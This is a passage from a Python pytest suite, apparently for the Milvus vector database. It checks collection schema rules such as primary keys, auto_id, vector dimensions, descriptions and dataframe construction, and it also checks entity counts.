def test_collection_non_string_primary_field(self, primary_field):
"""
target: test collection with non-string primary_field
method: primary_field type is not string
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_not_existed_primary_field(self):
"""
target: test collection with not exist primary field
method: specify not existed field as primary_field
expected: raise exception
"""
self._connect()
fake_field = cf.gen_unique_str()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=fake_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_schema(self):
"""
target: test collection with primary field
method: specify primary field in CollectionSchema
expected: collection.primary_field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_field(self):
"""
target: test collection with primary field
method: specify primary field in FieldSchema
expected: collection.primary_field
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(), cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
self.collection_wrap.init_collection(cf.gen_unique_str(prefix), schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_unsupported_primary_field(self, get_unsupported_primary_field):
"""
target: test collection with unsupported primary field type
method: specify non-int64 as primary field
expected: raise exception
"""
self._connect()
field = get_unsupported_primary_field
vec_field = cf.gen_float_vec_field(name="vec")
error = {ct.err_code: 1, ct.err_msg: "Primary key type must be DataType.INT64."}
self.collection_schema_wrap.init_collection_schema(fields=[field, vec_field], primary_field=field.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_primary_fields(self):
"""
target: test collection with multi primary
method: collection with two primary fields
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2", is_primary=True)
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one."}
self.collection_schema_wrap.init_collection_schema(
fields=[int_field_one, int_field_two, cf.gen_float_vec_field()],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_inconsistent(self):
"""
target: test collection with different primary field setting
method: 1. set A field is_primary 2. set primary_field is B
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=int_field_two.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_consistent(self):
"""
target: test collection with both collection schema and field schema
method: 1. set A field is_primary 2.set primary_field is A
expected: verify primary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field(is_primary=True)
schema = cf.gen_collection_schema(fields=[int_field_one, cf.gen_float_vec_field()],
primary_field=int_field_one.name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_field_schema(self, auto_id):
"""
target: test collection with auto_id in field schema
method: specify auto_id True in field schema
expected: verify schema's auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field])
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_collection_schema(self, auto_id):
"""
target: test collection with auto_id in collection schema
method: specify auto_id True in collection schema
expected: verify schema auto_id and collection schema
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_auto_id_non_primary_field(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_false_non_primary(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: verify schema auto_id is False
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name='int2', auto_id=False)
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
assert not schema.auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_inconsistent(self):
"""
target: test collection auto_id with both collection schema and field schema
method: 1.set primary field auto_id=True in field schema 2.set auto_id=False in collection schema
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "The auto_id of the collection is inconsistent with "
"the auto_id of the primary key field"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_consistent(self, auto_id):
"""
target: test collection auto_id with both collection schema and field schema
method: set auto_id=True/False both field and schema
expected: verify auto_id
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_none_in_field(self):
"""
target: test collection with auto_id is None
method: set auto_id=None
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
is_primary=True,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", ct.get_invalid_strs)
def test_collection_invalid_auto_id(self, auto_id):
"""
target: test collection with invalid auto_id
method: define field with auto_id=non-bool
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_fields_auto_id(self):
"""
target: test collection auto_id with multi fields
method: specify auto_id=True for multi int64 fields
expected: todo raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
cf.gen_int64_field(is_primary=True, auto_id=True)
self.field_schema_wrap.init_field_schema(name="int", dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [DataType.FLOAT_VECTOR, DataType.BINARY_VECTOR])
def test_collection_vector_without_dim(self, dtype):
"""
target: test collection without dimension
method: define vector field without dim
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field, _ = self.field_schema_wrap.init_field_schema(name="vec", dtype=dtype)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "dimension is not defined in field type params"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_vector_invalid_dim(self, get_invalid_dim):
"""
target: test collection with invalid dimension
method: define float-vec field with invalid dimension
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=get_invalid_dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: f'invalid dim: {get_invalid_dim}'}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dim", [-1, 0, 32769])
def test_collection_vector_out_bounds_dim(self, dim):
"""
target: test collection with out of bounds dim
method: invalid dim -1 and 32759
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "invalid dimension: {}. should be in range 1 ~ 32768".format(dim)}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_non_vector_field_dim(self):
"""
target: test collection with dim for non-vector field
method: define int64 field with dim
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
dim=ct.default_dim)
float_vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[int_field, float_vec_field],
primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_desc(self):
"""
target: test collection with description
method: create with description
expected: assert default description
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_none_desc(self):
"""
target: test collection with none description
method: create with none description
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=None)
error = {ct.err_code: 1, ct.err_msg: "None has type NoneType, but expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_long_desc(self):
"""
target: test collection with long desc
method: create with long desc
expected:
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
desc = "a".join("a" for _ in range(256))
schema = cf.gen_default_collection_schema(description=desc)
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_binary(self):
"""
target: test collection with binary-vec
method: create collection with binary field
expected: assert binary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_binary_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert c_name in self.utility_wrap.list_collections()[0]
class TestCollectionOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test collection interface operations
******************************************************************
"""
# def teardown_method(self):
# if self.self.collection_wrap is not None and self.self.collection_wrap.collection is not None:
# self.self.collection_wrap.drop()
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_connection(self):
"""
target: test collection without connection
method: 1.create collection after connection removed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.err_res, check_items=error)
assert self.collection_wrap.collection is None
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_create_drop(self):
"""
target: test cycle creation and deletion of multiple collections
method: in a loop, collections are created and deleted sequentially
expected: no exception
"""
self._connect()
c_num = 20
for _ in range(c_num):
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert c_name not in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_drop(self):
"""
target: test collection with dup name, and drop
method: 1. two dup name collection object
2. one object drop collection
expected: collection dropped
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
error = {ct.err_code: 1, ct.err_msg: f'HasPartition failed: can\'t find collection: {c_name}'}
collection_w.has_partition("p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_after_drop(self):
"""
target: test create collection after create and drop
method: 1. create a 2. drop a 3, re-create a
expected: no exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.drop()
assert not self.utility_wrap.has_collection(collection_w.name)[0]
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_all_datatype_fields(self):
"""
target: test create collection with all dataType fields
method: create collection with all dataType schema
expected: create successfully
"""
self._connect()
fields = []
for k, v in DataType.__members__.items():
if v and v != DataType.UNKNOWN and v != DataType.FLOAT_VECTOR and v != DataType.BINARY_VECTOR:
field, _ = self.field_schema_wrap.init_field_schema(name=k.lower(), dtype=v)
fields.append(field)
fields.append(cf.gen_float_vec_field())
schema, _ = self.collection_schema_wrap.init_collection_schema(fields,
primary_field=ct.default_int64_field_name)
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
class TestCollectionDataframe(TestcaseBase):
"""
******************************************************************
The following cases are used to test construct_from_dataframe
******************************************************************
"""
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_df(self, request):
if request.param is None:
pytest.skip("skip None")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_dataframe(self):
"""
target: test collection with dataframe data
method: create collection and insert with dataframe
expected: collection num entities equal to nb
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([c_name])
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_binary_dataframe(self):
"""
target: test binary collection with dataframe
method: create binary collection with dataframe
expected: collection num entities equal to nb
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df, _ = cf.gen_default_binary_dataframe_data(nb=ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_none_dataframe(self):
"""
target: test create collection by empty dataframe
method: invalid dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Dataframe can not be None."}
self.collection_wrap.construct_from_dataframe(c_name, None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_only_column(self):
"""
target: test collection with dataframe only columns
method: dataframe only has columns
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame(columns=[ct.default_int64_field_name, ct.default_float_vec_field_name])
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_inconsistent_dataframe(self):
"""
target: test collection with data inconsistent
method: create and insert with inconsistent data
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
# one field different type df
mix_data = [(1, 2., [0.1, 0.2]), (2, 3., 4)]
df = pd.DataFrame(data=mix_data, columns=list("ABC"))
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field='A', check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_non_dataframe(self, get_non_df):
"""
target: test create collection by invalid dataframe
method: non-dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Data type must be pandas.DataFrame."}
df = get_non_df
self.collection_wrap.construct_from_dataframe(c_name, df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_data_type_dataframe(self):
"""
target: test collection with invalid dataframe
method: create with invalid dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({"date": pd.date_range('20210101', periods=3), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_invalid_field_name(self):
"""
target: test collection with invalid field name
method: create with invalid field name dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({'%$#': cf.gen_vectors(3, 2), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_primary_field(self):
"""
target: test collection with none primary field
method: primary_field is none
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Schema must have a primary key field."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=None,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_not_existed_primary_field(self):
"""
target: test collection with not existed primary field
method: primary field not existed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=c_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_with_none_auto_id(self):
"""
target: test construct with non-int64 as primary field
method: non-int64 as primary field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and insert values
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: "Auto_id is True, primary field should not have data."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_no_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and not insert ids(primary fields all values are None)
expected: verify num entities
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
# df.drop(ct.default_int64_field_name, axis=1, inplace=True)
df[ct.default_int64_field_name] = None
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True)
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_true(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=true
expected: todo
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=True)
mutation_res = res[1]
assert cf._check_primary_keys(mutation_res.primary_keys, 100)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false(self):
"""
target: test construct with false auto_id
method: auto_id=False, primary_field correct
expected: verify auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=False)
assert not self.collection_wrap.schema.auto_id
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_none_value_auto_id_false(self):
"""
target: test construct with none value, auto_id
method: df primary field with none value, auto_id=false
expected: raise exception
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64"}
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_same_values(self):
"""
target: test construct with false auto_id and same value
method: auto_id=False, primary field same values
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[1:, 0] = 1
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
collection_w = res[0]
assert collection_w.num_entities == nb
mutation_res = res[1]
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_negative_values(self):
"""
target: test construct with negative values
method: auto_id=False, primary field values is negative
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
new_values = pd.Series(data=[i for i in range(0, -nb, -1)])
df[ct.default_int64_field_name] = new_values
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_dup_name(self):
"""
target: test collection with dup name and insert dataframe
method: create collection with dup name, none schema, dataframe
expected: two collection object is correct
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([collection_w.name])
assert collection_w.num_entities == ct.default_nb
assert collection_w.num_entities == self.collection_wrap.num_entities
class TestCollectionCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_count_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.count_entities(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_no_vectors(self, connect, collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 0
class TestCollectionCountIP:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
request.param.update({"metric_type": "IP"})
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created(self, connect, collection, get_simple_index, insert_count):
"""
target: test count_entities, after index have been created
method: add vectors in db, and create index, then calling count_entities with correct params
expected: count_entities raise exception
"""
entities = gen_entities(insert_count)
connect.insert(collection, entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
class TestCollectionCountBinary:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
request.param["metric_type"] = "HAMMING"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
request.param["metric_type"] = "SUBSTRUCTURE"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
request.param["metric_type"] = "SUPERSTRUCTURE"
return request.param
# TODO: need to update and enable
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_after_index_created_A(self, connect, binary_collection, get_hamming_index, insert_count):
"""
target: test count_entities, after index have been created
method: add vectors in db, and create index, then calling count_entities with correct params
expected: count_entities raise exception
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
connect.flush([binary_collection])
# connect.load_collection(binary_collection)
connect.create_index(binary_collection, default_binary_vec_field_name, get_hamming_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_entities(self, connect, binary_collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == 0
class TestCollectionMultiCollections:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_multi_collections_l2(self, connect, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
entities = gen_entities(insert_count)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_binary(self, connect, binary_collection, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
